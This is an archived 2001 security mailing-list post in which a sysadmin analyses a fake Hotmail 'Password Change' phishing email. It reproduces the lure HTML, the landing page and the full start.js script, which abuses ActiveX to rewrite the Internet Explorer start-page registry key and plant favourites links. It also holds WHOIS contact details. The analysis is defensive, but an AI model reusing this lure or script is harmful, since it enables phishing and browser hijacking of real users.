quentynat_private wrote: > > there appears to be a new hotmail malware thingy it is sent from > admin02at_private with the subject line of Password Change > > wonder how many people it will get before all the sites are closed? > > Detail - > > I just recieved this mail from 202.104.122.157 [1] > > #START > > >From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700 > Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id > MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 > -0700 > Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800 > From: admin02at_private > To: ${MYEMAIL}@hotmail.com > Subject: Password Change > Date: Sat, 8 Sep 2001 08:13:32 > Mime-Version: 1.0 > Content-Type: text/html; charset="DEFAULT_CHARSET" > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 5.00.2919.6700 > X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 > > <HTML> > > <HEAD> > > </HEAD> > > <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B" > ALINK="#FF0000"> > <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change > Confirmation</B></FONT> > </P> > <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully > changed. Please remember your new Password. </B></FONT></P> > <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A > HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this > please > click here to restore your old password.</A></FONT> </P> > </BODY> > </HTML> > > #END > > now going to maeveshomepage.com/ty.htm [2] in opera shows > > #START > > <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO > 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd"> > > <HTML> > > <HEAD> > <TITLE></TITLE> > </HEAD> > > <BODY BGCOLOR="#336699"> > <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P> > <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been > restored.</FONT> <SCRIPT SRC="start.js"> > </SCRIPT> > </P> > </BODY> > </HTML> > > #END > > and looking at start.js (the interesting bit) > > #START > > document.write("<APPLET HEIGHT=0 WIDTH=0 > code=com.ms.activeX.ActiveXComponent></APPLET>") function AddFavLnk(loc, > DispName, SiteURL) > { > var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); > Shor.TargetPath = SiteURL; > Shor.Save(); > } function f(){ > try > { > a1=document.applets[0]; > a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); > a1.createInstance(); > Shl = a1.GetObject(); > a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); > a1.createInstance(); > FSO = a1.GetObject(); > a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); > a1.createInstance(); > Net = a1.GetObject(); try{ var expdate = new Date((new Date()).getTime() > + (24 * 60 * 60 * 1000 * 90)); > document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; > path=/;" > ///////////////////////////////////////////////////////////////////////////////Ö÷Ò³ > Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start > Page", "http://yahhooo.devil.ru/"); > var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * > 90)); > document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; > path=/;" > var WF, Shor, loc; > WF = FSO.GetSpecialFolder(0); > loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) > { > loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName > + "\\Favorites"; > if(!FSO.FolderExists(loc)) > { > return; > } > } > ///////////////////////////////////////////////////////////////////////////////ÊղؼР> AddFavLnk(loc, " Britney Spears Nude", > "http://www.celebrities-revealed.com"); > AddFavLnk(loc, " Aol", "http://www.aol.com"); > } > catch(e){ } > } > catch(e){ } > } > function init(){ > setTimeout("f()", 1000); > } > init(); > > #END > > it appears to set your default home page to http://yahhooo.devil.ru/ [3] > and get your favorites (which may contain saved usernames and passwords) > > anybody got anything further? > > Q > > Notes > > [1] - inetnum: 202.104.122.128 - 202.104.122.159 > netname: SHENZHEN-JLXXCY-INFOR-LTD > descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD > country: CN > admin-c: HB58-AP > tech-c: HB58-AP > mnt-by: MAINT-CHINANET-GD > changed: ipadmat_private 20000920 > source: APNIC > > person: HU BOG > address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN > country: CN > phone: +86-755-3521135 > fax-no: +86-755-3396971 > e-mail: ipuserat_private > nic-hdl: HB58-AP > mnt-by: MAINT-CHINANET-GD > changed: ipadmat_private 20000920 > source: APNIC > > [2] - Registrant: > JBO > 223 S. 5th > usa, O --- > US > > Domain Name: MAEVESHOMEPAGE.COM > > Administrative Contact: > I, TJ bwestbyat_private > 223 S. 5th > usa, O --- > US > 1115551212 > > Technical Contact: > I, TJ bwestbyat_private > 223 S. 5th > usa, O --- > US > 1115551212 > > Billing Contact: > I, TJ bwestbyat_private > 223 S. 5th > usa, O --- > US > 1115551212 > > Record last updated on 11-Jul-2001. > Record expires on 07-May-2002. > Record Created on 07-May-2001. > > Domain servers in listed order: > NS1.VEGASSECURE.NET 208.50.15.6 > NS2.VEGASSECURE.NET 208.50.15.7 > > [3] - domain: DEVIL.RU > type: CORPORATE > admin-o: AK2000-RIPN > nserver: ns.kravchenko.ru. > nserver: srvr.list.ru. > created: 07-AUG-2000 > state: Delegated > changed: 19-MAY-2001 > mnt-by: ANDRIUSHA-MNT-RIPN > source: RIPN > > person: Andrey S Kravchenko > nic-hdl: AK2000-RIPN > address: Teatralny st 23a/30, > address: Donetsk, Ukraine, 340100 > phone: +7 902 6010000 > fax-no: +7 902 6010000 > e-mail: andreyat_private > changed: 18-AUG-2000 > mnt-by: ANDRIUSHA-MNT-RIPN > source: RIPN > > -- > ##################### > Quentyn Taylor > Sysadmin - Fotango > ##################### > You're damn right we need a rational code of morality and ethics. But > not much progress can > be made in that direction while we've still got a majority ranting about > gods, devils, souls, and > absolute morality, and using an ancient book written by ignorant nomads > as a guide. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 13:17:10 PDT